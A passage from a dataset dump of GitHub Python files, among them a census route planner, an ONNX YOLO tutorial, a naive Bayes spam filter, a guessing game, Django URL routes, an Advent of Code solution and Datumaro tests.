range(0,len(marginList),2):\n src = marginList[i]\n if int(i)+2 > len(marginList)-1:\n break\n dst = marginList[i+2]\n D,P = Dijkstra(loc,src)\n print(\"\\n\\n\\n\\n================================================================\")\n print(\"Path from \"+src+\" to \"+dst)\n path = DSAStack()\n\n try:\n previousV = P[dst]\n except KeyError as error:\t\t#need to change state\n print(\"\\n\\t==Must go to airport first!==\\n\")\n tempSrc = marginList[i+1]\t#currentState airport\n tempDst = marginList[i+3]\t#destState airport\n srcAirport = findAirport(tempSrc)\n dstAirport = findAirport(tempDst)\n #Div to airport\n makePath(P,path, src, srcAirport)\n print(srcAirport)\n print(\"Total time taken for trip is: \"+str(D[srcAirport])+\"\\n\")\n minutes = minutes + D[srcAirport]\n #Airport to Airport\n makePath(P,path, srcAirport, dstAirport)\n print(dstAirport)\n print(\"Total time taken for trip is: \"+str(D[dstAirport])+\"\\n\")\n minutes = minutes + D[dstAirport]\n #Airport to Division\n src = dstAirport\n D,P = Dijkstra(loc, src)\n\n makePath(P, path, src, dst)\n print(dst)\n print(\"Total time taken for trip is: \"+str(D[dst])+\"\\n\")\n minutes = minutes + D[dst]\n print(\"\\n\\nTotal travel time accross all marginal division: \"+str(minutes)+\" minutes\\n\")\n\n #when each option has been executed, show main menu again\n mainMenu()\n choice = input(\"Your Selection is (A-D):\\t\")\n\n\n","repo_name":"amandaefendi/uniprojects","sub_path":"Data Structures - Census Data 2018/mains.py","file_name":"mains.py","file_ext":"py","file_size_in_byte":20085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41165210611","text":"import numpy\n\nfrom pathlib import Path\nimport onnxruntime_extensions\n\n\ndef get_yolo_model(version: int, onnx_model_name: str):\n # install yolov8\n from pip._internal import main as pipmain\n try:\n import ultralytics\n except ImportError:\n pipmain(['install', 'ultralytics'])\n import ultralytics\n pt_model = Path(f\"yolov{version}n.pt\")\n model = ultralytics.YOLO(str(pt_model)) # load a pretrained model\n exported_filename = model.export(format=\"onnx\") # export the model to ONNX format\n assert exported_filename, f\"Failed to export yolov{version}n.pt to onnx\"\n import shutil\n shutil.move(exported_filename, onnx_model_name)\n\n\ndef add_pre_post_processing_to_yolo(input_model_file: Path, output_model_file: Path):\n \"\"\"Construct the pipeline for an end2end model with pre and post processing. 
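# The itinerary code above expects a Dijkstra(graph, src) helper from the
# accompanying functionsD module (not shown) that returns a distance map D
# and a predecessor map P. A minimal heap-based sketch with that return
# shape (an assumption -- the real functionsD implementation may differ):
import heapq

def dijkstra_sketch(adj, src):
    """adj maps node -> [(neighbour, minutes), ...]."""
    D = {src: 0}   # best known travel time per node
    P = {}         # predecessor on the best path
    heap = [(0, src)]
    while heap:
        d, u = heapq.heappop(heap)
        if d > D.get(u, float("inf")):
            continue  # stale heap entry
        for v, w in adj.get(u, []):
            nd = d + w
            if nd < D.get(v, float("inf")):
                D[v], P[v] = nd, u
                heapq.heappush(heap, (nd, v))
    return D, P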
\n The final model can take raw image binary as inputs and output the result in raw image file.\n\n Args:\n input_model_file (Path): The onnx yolo model.\n output_model_file (Path): where to save the final onnx model.\n \"\"\"\n from onnxruntime_extensions.tools import add_pre_post_processing_to_model as add_ppp\n add_ppp.yolo_detection(input_model_file, output_model_file, \"jpg\", onnx_opset=18)\n\n\ndef run_inference(onnx_model_file: Path):\n import onnxruntime as ort\n import numpy as np\n\n providers = ['CPUExecutionProvider']\n session_options = ort.SessionOptions()\n session_options.register_custom_ops_library(onnxruntime_extensions.get_library_path())\n\n image = np.frombuffer(open('../test/data/ppp_vision/wolves.jpg', 'rb').read(), dtype=np.uint8)\n session = ort.InferenceSession(str(onnx_model_file), providers=providers, sess_options=session_options)\n\n inname = [i.name for i in session.get_inputs()]\n inp = {inname[0]: image}\n output = session.run(['image_out'], inp)[0]\n output_filename = '../test/data/result.jpg'\n open(output_filename, 'wb').write(output)\n from PIL import Image\n Image.open(output_filename).show()\n\n\nif __name__ == '__main__':\n # YOLO version. Tested with 5 and 8.\n version = 8\n onnx_model_name = Path(f\"../test/data/yolov{version}n.onnx\")\n if not onnx_model_name.exists():\n print(\"Fetching original model...\")\n get_yolo_model(version, str(onnx_model_name))\n\n onnx_e2e_model_name = onnx_model_name.with_suffix(suffix=\".with_pre_post_processing.onnx\")\n print(\"Adding pre/post processing...\")\n add_pre_post_processing_to_yolo(onnx_model_name, onnx_e2e_model_name)\n print(\"Testing updated model...\")\n run_inference(onnx_e2e_model_name)\n","repo_name":"yxliang/onnxruntime-extensions","sub_path":"tutorials/yolo_e2e.py","file_name":"yolo_e2e.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"26414584849","text":"#!/usr/bin/env python2\n\n\n\n# Importing Logger, See logger.py for configuration.\nimport os\nimport sys\n\nfrom logger import log\n\nfrom subjects import EmployeeFile\nfrom subjects import FacilityRequest\n\nWORK_PATH = '/home/mix-man/temp/Work/'\nSOURCE_PATH = WORK_PATH\n\nPATH_FAC_REQUEST = '/home/mix-man/temp/Facility Requests'\n\n\nclass ProcessFile(object):\n\n def __init__(self, SOURCE):\n self.FILENAME = os.path.basename(SOURCE)\n self.BASE_DIR = os.path.dirname(SOURCE)\n self.REL_BASE_DIR = os.path.relpath(self.BASE_DIR, SOURCE_PATH)\n self.SUBJECT, self.TYPE = os.path.split(self.REL_BASE_DIR)\n\n log.debug('[{0}] FILENAME : {1}'.format(SOURCE, self.FILENAME ))\n log.debug('[{0}] BASE_DIR : {1}'.format(SOURCE, self.BASE_DIR))\n log.debug('[{0}] REL_BASE_DIR : {1}'.format(SOURCE, self.REL_BASE_DIR))\n log.debug('[{0}] SUBJECT : {1}'.format(SOURCE, self.SUBJECT))\n log.debug('[{0}] TYPE : {1}'.format(SOURCE, self.TYPE))\n\n def Subject(self):\n if \"Facility Requests\" in self.REL_BASE_DIR: return 'Facility Request'\n if 'Employee File' in self.SUBJECT: return 'Employee File'\n return 'Unknown'\n\n\n\ndef Start(SOURCE):\n '''\n Detects which \"Subject\" the file is and sends it to the correct handler\n '''\n\n log.info(' ')\n log.info('--------------------------------------------')\n log.info('[{0}]: Processing File'.format(SOURCE))\n\n file = ProcessFile(SOURCE)\n\n if file.Subject() == 'Unknown':\n log.critical('[{0}]: Unable to determine subject!'.format(SOURCE))\n sys.exit()\n\n elif file.Subject() == 'Facility Request':\n 
log.debug('[{0}]: Detected Facility Request...'.format(SOURCE))\n FacilityRequest.Start(SOURCE, PATH_FAC_REQUEST)\n\n\n elif file.Subject() == 'Employee File':\n pass\n\n else:\n log.critical('[{0}]: Unknown error has occured while processing file...'.format(SOURCE))\n sys.exit()\n\nfor DIR, SUB, FILES in os.walk(os.path.join(SOURCE_PATH,'Facility Requests')):\n for FILE in FILES:\n Start(os.path.join(DIR, FILE))\n\n# for file in os.listdir(SOURCE_PATH):\n# print file\n\n# Start('/home/mix-man/Facility Requests/2018-01-01 - DAY-CREW - MPR.pdf')\n# Start('/home/mix-man/Facility Requests/2018-01-01 - 0800-0900 - MPR.pdf')\n# Start('/home/mix-man/Facility Requests/2018-01-01T1630 - 2018-01-02T1800 - MPR.pdf')\n# Start('/home/mix-man/Facility Requests/2018-01-01T1630 - 2018-01-02T1800 - MPR - Special Setup.pdf')\n# Start('/home/mix-man/Employee Files/Training/Last, First - 2018-06-09 - EEO.pdf')\n# Start('/home/mix-man/Employee Files/Leave Slips/Last, First - 2018-06-09T0700 - 2018-06-09T1600 - Message.pdf')\n# Start('/home/mix-man/Last, First - 2018-06-09T0700 - 2018-06-09T1600 - Message.pdf')\n\n","repo_name":"djmixman/Work-Repo","sub_path":"MFHandler/mfhandler/mfhandler.py","file_name":"mfhandler.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5889989766","text":"def count_ways(n): \n \"\"\"\n To count number of ways \n one can move from A to B\n \"\"\"\n if n==0:\n return 1\n elif n==1:\n return 2\n elif n==2:\n return 3\n\n edges = [0 for i in range(0, n + 1)] \n\n # base cases \n edges[0] = edges[1] = 1\n edges[2] = 2\n edges[3] = 4\n\n # Iterate from 4 to n \n for i in range(4, n + 1): \n edges[i] = edges[i - 1] + edges[i - 2] + edges[i - 3] \n\n return edges[-1] \n \n \n# Driver code \nif __name__ == \"__main__\":\n n = int(input())\n while(n > 0):\n stations = int(input())\n print(count_ways(stations))\n n-=1","repo_name":"navaneethsdk/Codehub","sub_path":"general/train_trip.py","file_name":"train_trip.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74365153682","text":"import time\n\nt = input(\"Digite o tempo em (segundos): \")\n #tratando o digito com um numero inteiro\nif t.isdigit():\n t = int(t)\nelse:\n print(\"Entrada Invalida\")\n quit()\n #tratamento do cronometro usando divmod e time.sleep\nwhile t:\n minutes, seconds = divmod(t, 60)\n timer = \"{:02d}:{:02d}\".format(minutes, seconds)\n print(timer, end=\"\\r\")\n time.sleep(1)\n t -= 1\nprint(\"Tempo Acabou!!!\")","repo_name":"zeldinha00/Projetos_Python_Iniciantes","sub_path":"04_Projeto_Cronometro/04_cronometro.py","file_name":"04_cronometro.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29739621130","text":"#!/usr/bin/env python\n\nfrom db_functions import get_targets, get_rows_for_target\nfrom flask import Flask, request, render_template\n\n# create web application\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n targets_list = get_targets()\n return render_template('index.html',targets=targets_list)\n\n@app.route('/results')\ndef show_results():\n target = request.args['target']\n evalue = float(request.args['cutoff'])\n blast_results = get_rows_for_target(target,evalue)\n return render_template('results.html',rows=blast_results)\n\nif __name__ == \"__main__\":\n # start the web application\n 
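# count_ways above implements the 1/2/3-step ("tribonacci") recurrence
# f(n) = f(n-1) + f(n-2) + f(n-3). Note that its early returns use f(1)=2
# and f(2)=3 while its table is seeded with edges[1]=1 and edges[2]=2, so
# the two code paths disagree. A memoised cross-check using the table's
# convention (f(0)=1, f(n<0)=0) gives f(1)=1, f(2)=2, f(3)=4, f(4)=7:
from functools import lru_cache

@lru_cache(maxsize=None)
def count_ways_rec(n):
    if n < 0:
        return 0
    if n == 0:
        return 1
    return count_ways_rec(n - 1) + count_ways_rec(n - 2) + count_ways_rec(n - 3)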
app.run()\n","repo_name":"Hz-Lin/wur_bioinfomatics","sub_path":"Practical_Computing/w5d4/blast_browser.py","file_name":"blast_browser.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72255764560","text":"# _*_ coding: utf-8 _*_\n\nimport numpy as np\nimport os\n\ndef textParser(text):\n    import re\n    regEx = re.compile(r'[^a-zA-Z]|\\d') # split on non-letters and on digits, keeping only the words\n    words = regEx.split(text)\n    # drop empty strings and lowercase everything\n    words = [word.lower() for word in words if len(word) > 0]\n    return words\n\ndef loadEMailData(spamFileDir,hamFileDir):\n    classCategory = [] # class labels: 1 for spam mail, 0 for ham mail\n    Words = []\n    for filename in os.listdir(spamFileDir):\n        with open(spamFileDir + '/' + filename, 'r') as email:\n            classCategory.append(1)\n            words = textParser(email.read())\n            Words.append(words)\n\n    for filename in os.listdir(hamFileDir):\n        with open(hamFileDir + '/' + filename, 'r') as email:\n            classCategory.append(0)\n            words = textParser(email.read())\n            Words.append(words)\n    return Words, classCategory\n\ndef createVocabularyList(Words):\n    vocabularySet = set([])\n    for words in Words:\n        vocabularySet = vocabularySet | set(words)\n    vocabularyList = list(vocabularySet)\n    return vocabularyList\n\ndef setOfWordsToVecTor(vocabularyList, Words):\n    vocabMarked = [0] * len(vocabularyList)\n    for Word in Words:\n        if Word in vocabularyList:\n            vocabMarked[vocabularyList.index(Word)] = 1\n    return vocabMarked\n\n\ndef setOfWordsListToVecTor(vocabularyList, WordsList):\n    vocabMarkedList = []\n    for i in range(len(WordsList)):\n        vocabMarked = setOfWordsToVecTor(vocabularyList, WordsList[i])\n        vocabMarkedList.append(vocabMarked)\n    return vocabMarkedList\n\n\ndef trainingNaiveBayes(trainMarkedWords, trainCategory):\n    # total number of training documents\n    numTrainDoc = len(trainMarkedWords)\n    # total number of features\n    numWords = len(trainMarkedWords[0])\n    # prior probability of spam, P(S)\n    pSpam = sum(trainCategory) / float(numTrainDoc)\n    # for every feature, accumulate its occurrence counts within each class\n    wordsInSpamNum = np.ones(numWords)\n    wordsInHamNum = np.ones(numWords)\n    spamWordsNum = 2\n    HamWordsNum = 2\n    for i in range(0, numTrainDoc):\n        if trainCategory[i] == 1: # spam document\n            wordsInSpamNum += trainMarkedWords[i]\n            spamWordsNum += 1 # count of spam documents (smoothed denominator)\n        else:\n            wordsInHamNum += trainMarkedWords[i]\n            HamWordsNum += 1\n    pWordsSpam = np.log(wordsInSpamNum / spamWordsNum)\n    pWordsHam = np.log(wordsInHamNum / HamWordsNum)\n    return pWordsSpam, pWordsHam, pSpam\n\ndef classify(vocabularyList, pWordsSpam, pWordsHam, pSpam, testWords):\n    testWordsCount = setOfWordsToVecTor(vocabularyList, testWords)\n    testWordsMarkedArray = np.array(testWordsCount)\n    # compute P(Ci|W) for word vector W; comparing P(W|Ci)P(Ci) is sufficient\n    p1 = sum(testWordsMarkedArray * pWordsSpam) + np.log(pSpam)\n    p0 = sum(testWordsMarkedArray * pWordsHam) + np.log(1 - pSpam)\n    if p1 > p0:\n        return 1\n    else:\n        return 0","repo_name":"eurekao/spam-bayes-filter","sub_path":"python/NavieBayes.py","file_name":"NavieBayes.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
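# A convenience wrapper tying the helpers above together (sketch; it is not
# part of the original module, and the directory/file arguments are
# placeholders):
def classify_email_file(path, spam_dir, ham_dir):
    words, labels = loadEMailData(spam_dir, ham_dir)
    vocab = createVocabularyList(words)
    marked = setOfWordsListToVecTor(vocab, words)
    p_words_spam, p_words_ham, p_spam = trainingNaiveBayes(marked, labels)
    with open(path) as fh:
        # returns 1 for spam, 0 for ham
        return classify(vocab, p_words_spam, p_words_ham, p_spam,
                        textParser(fh.read()))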
+{"seq_id":"22910620442","text":"#programming game test\n#BatNum\n\n#imports\nimport time\nimport random\n\n#global var\nglobal gameon\ngameon=True\n\n#SCRIPTS\nglobal i_will_pick\ni_will_pick=[\"I will pick a 3-digit number... Can you guess it?\",\"I will pick my own number, and it is a 3-digit number!\"]\nglobal do_this\ndo_this=[\"Go!\",\"Guess what~\",\"You are still wrong.. haha\",\"Let's try!\",\"Guess what!\"]\nglobal cant_understand\ncant_understand=[\"It is not digits...\"]\nglobal wrong_len\nwrong_len=[\"Hey player, I said it is a 3-digit NUMBER!\"]\nglobal you_correct\nyou_correct=[\"You are right!\",\"Congratulations!\"]\n\n\ndef say(usr, msg):\t\t#it will support TTS on make through say msg cmd.\n\tprint(\"[\"+time.strftime(\"%M:%S\",time.localtime())+\"] \"+\"(\"+usr+\") \"+msg)\n\ndef getScript(scrList):\t#pick script randomly\n\tif len(scrList)==0:\n\t\treturn \"\"\n\telse:\n\t\treturn scrList[random.randint(0,len(scrList)-1)]\n\ndef check(targetNum,cmd):\t\t\t#1->clear -1->bad input\n\tglobal wrong_len\n\tif len(cmd)==1:\n\t\tcmd=\"00\"+cmd\n\telif len(cmd)==2:\n\t\tcmd=\"0\"+cmd\n\telif len(cmd)==3:\n\t\tpass\n\telse:\n\t\tsay(\"Computer\",getScript(wrong_len))\n\t\treturn -1\n\tresultMsg=\"\"\n\tscore=0\n\tfor i in range(0,len(cmd)):\n\t\tif cmd[i]==targetNum[i]:\n\t\t\tif score==0:\n\t\t\t\tresultMsg+=\"FERMI\"\n\t\t\t\tscore+=2\n\t\t\telse:\n\t\t\t\tresultMsg+=\", FERMI\"\n\t\t\t\tscore+=2\n\t\telse:\n\t\t\tfor ii in range(0,len(cmd)):\n\t\t\t\tif cmd[i]==targetNum[ii]:\n\t\t\t\t\tif score==0:\n\t\t\t\t\t\tresultMsg+=\"PICO\"\n\t\t\t\t\t\tscore+=1\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tresultMsg+=\", PICO\"\n\t\t\t\t\t\tscore+=1\n\t\t\t\t\t\tbreak\n\tif score==0:\n\t\tresultMsg+=\"BAGELS\"\n\telif score==6:\n\t\treturn 1\n\tsay(\"Computer\",resultMsg)\n\n\ndef game():\t\t\t\t#game loop\n\tglobal i_will_pick\n\tglobal do_this\n\tglobal cant_understand\n\tglobal you_correct\n\n\tstartTime=time.time()\n\tclear=False\n\ttargetNum=str(random.randint(0,999))\n\ttryTimes=1\n\t# make 3 digits\n\tif len(targetNum)==1:\n\t\ttargetNum=\"00\"+targetNum\n\telif len(targetNum)==2:\n\t\ttargetNum=\"0\"+targetNum\n\telse:\n\t\tpass\n\tprint(\"targetNum=\"+targetNum)\n\tsay(\"Computer\",getScript(i_will_pick))\n\twhile not(clear):\n\t\t#try:\n\t\tif tryTimes>20:\t\t# check if the player has failed\n\t\t\tsay(\"Computer\",\"You failed!\")\n\t\t\tclear=True\n\t\t\tbreak\n\t\tsay(\"Computer\",getScript(do_this))\n\t\tinp=input(\"Try \"+str(tryTimes)+\" Times >U>S>E>R> \")\n\t\tif inp==\"show me the money\":\n\t\t\tsay(\"System\",\"Cheat Result : \"+str(targetNum))\n\t\tcheckResult=check(targetNum,inp)\n\t\tif checkResult==1:\n\t\t\tsay(\"Computer\",getScript(you_correct))\n\t\t\tclear=True\n\t\t\tendTime=time.time()\n\t\t\tsay(\"Computer\",\"You took \"+str(tryTimes)+\" tries and \"+str(int(endTime-startTime))+\" seconds.\")\n\t\t\tbreak\n\t\ttryTimes+=1\n\nwhile gameon:\t\t\t#main loop\n\tprint(\"===============================\")\n\tprint(\"= S T A R T ? =\")\n\tprint(\"===============================\")\n\tsay(\"System\",\"Do You Want To Start? (Y:Yes, N:No)\")\n\ttry:\n\t\tinp = input(\">U>S>E>R> \")\n\texcept:\n\t\tsay(\"System\",\"Check your Python version. This game needs Python 3.x~\")\n\t\texit()\n\tif inp.lower()==\"y\":\n\t\tgame()\n\telif inp.lower()==\"n\":\n\t\texit()\n\telse:\n\t\tprint(\"Wrong input: \"+inp.lower())","repo_name":"gmlwns2000/computer_science","sub_path":"test_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"73214355601","text":"from django.contrib import admin\nfrom django.urls import path\nfrom web.views import createCustomer,createProduct,CustomerList,ProductList,index_view,ProductDetailView,CustomerDetailView\nfrom web.views import UpdateCustomer,edit_view,UpdateProduct,editcus_view,editpro_view,clist,plist,DeleteCustomer,DeleteProduct,logout\nfrom web.views import trans_view,Createtrans,search,searchbyname,searchdate,searchbydate,searchbydatename,searchdatenameform,login\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('',index_view),\n    path('edit/',edit_view),\n    path('customer/create/',createCustomer.as_view()),\n    path('customer/',CustomerList.as_view()),\n    path('customer/detail/<int:pk>/',CustomerDetailView.as_view()),\n    path('product/create/',createProduct.as_view()),\n    path('product/',ProductList.as_view()),\n    path('product/detail/<int:pk>/',ProductDetailView.as_view()),\n    path('edit/customer/update/<int:pk>/',UpdateCustomer.as_view()),\n    path('edit/product/update/<int:pk>/',UpdateProduct.as_view()),\n    path('edit/customer/',editcus_view),\n    path('edit/product/',editpro_view),\n    path('edit/customer/update/',clist),\n    path('edit/product/update/',plist),\n    path('edit/customer/delete/<int:pk>/',DeleteCustomer.as_view()),\n    path('edit/product/delete/<int:pk>/',DeleteProduct.as_view()),\n    path('edit/customer/delete/',clist),\n    path('edit/product/delete/',plist),\n    path('trans/',trans_view), \n    path('trans/create/',Createtrans.as_view()),\n    path('trans/search/',search),\n    path('trans/search/name/',searchbyname),\n    path('trans/searchd/',searchdate),\n    path('trans/search/date/',searchbydate),\n    path('trans/searchdatename/',searchdatenameform),\n    path('trans/searchdatename/search/',searchbydatename),\n    path('login/',login ,name='login'),\n    path('logout/',logout ,name='logout'),\n    \n]\n","repo_name":"Chintu612/mywebsite","sub_path":"myweb/myweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6432718781","text":"import cv2\nimport time\n\ndef main():\n    # dir = '/Users/satousuguru/workspace/programing/python' \\\n    #       '/emotion_recognition/samples/datas/video_audio_record_send_sample_data/'\n    dir = \"/Users/satousuguru/Movies/\"\n    name = \"with_sota_kobayashi_cut\"\n    ext = '.mp4'\n    new_ext = '.mp4'\n    # fmt = cv2.VideoWriter_fourcc('M','J','P','G')\n    fmt = cv2.VideoWriter_fourcc(*\"mp4v\")\n\n\n    new_fps = 1\n    cap = cv2.VideoCapture(dir + name + ext)\n    size = (640, 360)\n    fps = cap.get(cv2.CAP_PROP_FPS)\n\n    interval = int(fps/new_fps)\n    writer = cv2.VideoWriter(dir + name + \"_slice\" + new_ext, fmt, new_fps, size)\n\n    print(\"fps=\", fps, \"new_fps=\", new_fps, \"interval=\", interval)\n    frame_num = 0\n\n    while cap.isOpened():\n        ret, frame = cap.read()\n        frame_num += 1\n        if not ret:\n            break\n\n        frame = cv2.resize(frame, size)\n        # cv2.imshow(\"frame\", frame)\n        # cv2.waitKey(1)\n        if frame_num % interval == 0:\n            writer.write(frame)\n\n    writer.release()\n    cap.release()\n    # cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n    main()\n    
print(\"finish\")\n","repo_name":"sgr0416st/emotion_recognition","sub_path":"test_codes/slice_movie_test.py","file_name":"slice_movie_test.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71623758800","text":"# Global imports\nfrom collections import namedtuple\n\nimport numpy as np\n\n# local imports\nfrom .unit_helper import unit\n\n_node_defaults = ( # node_id is required\n None, # pos\n 0, # height\n unit.Quantity(0, \"bar\"), # pressure_min\n unit.Quantity(np.Infinity, \"bar\"), # pressure_max\n)\n\n\nclass Node(\n namedtuple(\"NodeNamedTuple\", [\"node_id\", \"pos\", \"height\", \"pressure_min\", \"pressure_max\"], defaults=_node_defaults),\n):\n \"\"\"\n Node in a gas transport network.\n Realized by inheritance from a suitable namedtuple.\n \"\"\"\n\n\n_entry_defaults = (\n _node_defaults\n + (\n unit.Quantity(0, \"m_cube_per_hour\"), # flow_min\n unit.Quantity(np.Infinity, \"m_cube_per_hour\"), # flow_max\n unit.Quantity(0, \"m_cube_per_hour\"), # nomination_min\n unit.Quantity(0, \"m_cube_per_hour\"), # nomination_max\n )\n + (None,) * 9\n)\n\n\nclass Entry(\n namedtuple(\n \"EntryNamedTuple\",\n Node._fields\n + (\n \"flow_min\",\n \"flow_max\",\n \"nomination_min\",\n \"nomination_max\",\n \"gas_temp\",\n \"calorific_value\",\n \"norm_density\",\n \"heat_coeff_A\",\n \"heat_coeff_B\",\n \"heat_coeff_C\",\n \"molar_mass\",\n \"pseudocritical_pressure\",\n \"pseudocritical_temperature\",\n ),\n defaults=_entry_defaults,\n ),\n):\n \"\"\"\n Entry node in a gas transport network.\n Realized by inheritance from a suitable namedtuple.\n \"\"\"\n\n\n_exit_defaults = _node_defaults + (\n unit.Quantity(0, \"m_cube_per_hour\"), # flow_min\n unit.Quantity(np.Infinity, \"m_cube_per_hour\"), # flow_max\n unit.Quantity(0, \"m_cube_per_hour\"), # nomination_min\n unit.Quantity(0, \"m_cube_per_hour\"), # nomination_max\n)\n\n\nclass Exit(\n namedtuple(\n \"ExitNamedTuple\",\n Node._fields + (\"flow_min\", \"flow_max\", \"nomination_min\", \"nomination_max\"),\n defaults=_exit_defaults,\n ),\n):\n \"\"\"\n Exit node in a gas transport network.\n Realized by inheritance from a suitable namedtuple.\n \"\"\"\n","repo_name":"m-schmidt-math-opt/cost-of-not-knowing-enough","sub_path":"cost_of_not_knowing/gaslibparser/gaslibparser/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"6482725797","text":"import numpy as np\n\nwith open(\"day8_input.txt\", \"r\") as f:\n grid = []\n for line in f:\n add_line = line.strip()\n grid.append([int(char) for char in add_line])\n\n grid = np.array(grid)\n scenic = 0\n for i in range(1, grid.shape[0] - 1):\n for j in range(1, grid.shape[1] - 1):\n complete = [False, False, False, False]\n num_checks = 0\n scene = [0, 0, 0, 0]\n while sum(complete) != 4:\n num_checks += 1\n if not complete[0]: # northern check\n scene[0] += 1\n if j - num_checks == 0 or grid[i, j] <= grid[i, j - num_checks]:\n complete[0] = True\n\n if not complete[1]: # southern check\n scene[1] += 1\n if j + num_checks == 98 or grid[i, j] <= grid[i, j + num_checks]:\n complete[1] = True\n\n if not complete[2]: # western check\n scene[2] += 1\n if i - num_checks == 0 or grid[i, j] <= grid[i - num_checks, j]:\n complete[2] = True\n\n if not complete[3]: # western check\n scene[3] += 1\n if i + num_checks == 98 or grid[i, j] <= grid[i + num_checks, j]:\n complete[3] 
= True\n\n            scenic = max(scenic, scene[0] * scene[1] * scene[2] * scene[3])\n    print(scenic)\n","repo_name":"ThePoleThatFishes/attempts-at-aoc","sub_path":"Day 08/day8.2.py","file_name":"day8.2.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"38216959763","text":"import numpy as np\n\ndef hard_limiter(u): #hard limit activation function (step function)\n    if u < 0:\n        y_pred = 0\n    else:\n        y_pred = 1\n    return y_pred\n\n\ndef model(input, weight, bias): #Perceptron Model \n\ty = np.dot(weight, input) + bias\n\ty = hard_limiter(y)\n\treturn y\n\n##OR Logic Function\ndef or_logic(input, y_pred): #initially w1 = 0 , w2 = 0 , bias = -0.2\n    w1 = 0\n    w2 = 0\n    weight = np.array([w1, w2])\n    bias = -0.2\n    Y_true = [0,1] \n    Y_pred = [y_pred, y_pred] \n    error = np.square(np.subtract(Y_true,Y_pred)).mean()\n    print(error)\n    return model(input, weight, bias)\n\n# testing the Perceptron Model\ntest1 = np.array([0, 1])\ntest2 = np.array([1, 1])\ntest3 = np.array([0, 0])\ntest4 = np.array([1, 0])\n\ndesired1 = 0\ndesired2 = 1\ndesired3 = 0\ndesired4 = 0\n\"\"\"\nout1 = or_logic(test1)\nout2 = or_logic(test2)\nout3 = or_logic(test3)\nout4 = or_logic(test4)\n\n\"\"\"\n\n#if desired1 == out1 \n\"\"\"\nprint(\"OR({}, {}) = {}\".format(0, 1, or_logic(test1)))\nprint(\"OR({}, {}) = {}\".format(1, 1, or_logic(test2)))\nprint(\"OR({}, {}) = {}\".format(0, 0, or_logic(test3)))\nprint(\"OR({}, {}) = {}\".format(1, 0, or_logic(test4)))\n\"\"\"\n\n#if out1 = \n\n#def updating_weights(test2):\n\n\n\n","repo_name":"samiya-jabbar/NED-Masters-Deep-learning-assignment-1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"9126239996","text":"from unittest import TestCase\nfrom zipfile import ZipFile\nimport os\nimport os.path as osp\n\nimport numpy as np\n\nfrom datumaro.cli.__main__ import main\nfrom datumaro.components.dataset import Dataset, DatasetItem\nfrom datumaro.util.test_utils import TestDir, compare_datasets\n\nfrom ..requirements import Requirements, mark_requirement\n\n\ndef run(test, *args, expected_code=0):\n    test.assertEqual(expected_code, main(args), str(args))\n\ndef make_zip_archive(src_path, dst_path):\n    with ZipFile(dst_path, 'w') as archive:\n        for (dirpath, _, filenames) in os.walk(src_path):\n            for name in filenames:\n                path = osp.join(dirpath, name)\n                archive.write(path, osp.relpath(path, src_path))\n\nclass ImageZipIntegrationScenarios(TestCase):\n    @mark_requirement(Requirements.DATUM_267)\n    def test_can_save_and_load(self):\n        source_dataset = Dataset.from_iterable([\n            DatasetItem(id='1', image=np.ones((5, 5, 3))),\n            DatasetItem(id='2', image=np.ones((2, 8, 3)))\n        ])\n\n        with TestDir() as test_dir:\n            source_dataset.export(test_dir, format='image_dir')\n            zip_path = osp.join(test_dir, 'images.zip')\n            make_zip_archive(test_dir, zip_path)\n\n            run(self, 'create', '-o', test_dir)\n            run(self, 'add', 'path', '-p', test_dir, '-f', 'image_zip', zip_path)\n\n            export_path = osp.join(test_dir, 'export.zip')\n            run(self, 'export', '-p', test_dir, '-f', 'image_zip',\n                '-o', test_dir, '--overwrite', '--',\n                '--name', osp.basename(export_path)\n            )\n\n            parsed_dataset = Dataset.import_from(export_path, format='image_zip')\n            compare_datasets(self, source_dataset, parsed_dataset)\n\n    @mark_requirement(Requirements.DATUM_267)\n    def test_can_export_zip_images_from_coco_dataset(self):\n        with TestDir() as 
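# Each of the four scans above walks outward until it hits the grid edge or
# an equal-or-taller tree; the same logic as a stand-alone helper (sketch),
# where heights is the row of tree heights in one viewing direction:
def viewing_distance(heights, h):
    dist = 0
    for other in heights:
        dist += 1
        if other >= h:
            break
    return dist
# e.g. viewing_distance([3, 5, 3], 5) == 2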
